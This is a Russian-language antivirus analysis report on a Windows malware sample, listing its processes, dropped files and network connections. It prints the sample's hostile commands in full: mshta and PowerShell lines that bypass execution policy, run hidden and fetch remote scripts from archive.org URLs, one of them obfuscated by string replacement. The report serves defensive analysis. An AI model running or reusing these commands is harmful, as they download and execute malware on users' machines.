Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\mshta.exe' https://ia601503.us.archive.org/19/items/google_20210527/google.txt
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\msi.ps1
Сетевая активность
Подключается к
- 'ia#####3.us.archive.org':443
- 'cr#.#odaddy.com':80
- 'ia#####7.us.archive.org':443
- 'fi#####iworkshop.org':443
- 'ia#####9.us.archive.org':443
TCP
Запросы HTTP GET
- http://cr#.#odaddy.com/gdroot.crl
UDP
- DNS ASK ia#####3.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK ia#####7.us.archive.org
- DNS ASK fi#####iworkshop.org
- DNS ASK ia#####9.us.archive.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\msi.ps1'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $www='https://ia601407.us.archive.org/12/items/4_20210527_20210527_1306/4.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $www='https://ia601407.us.archive.org/12/items/4_20210527_20210527_1306/4.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\11.ps1'"
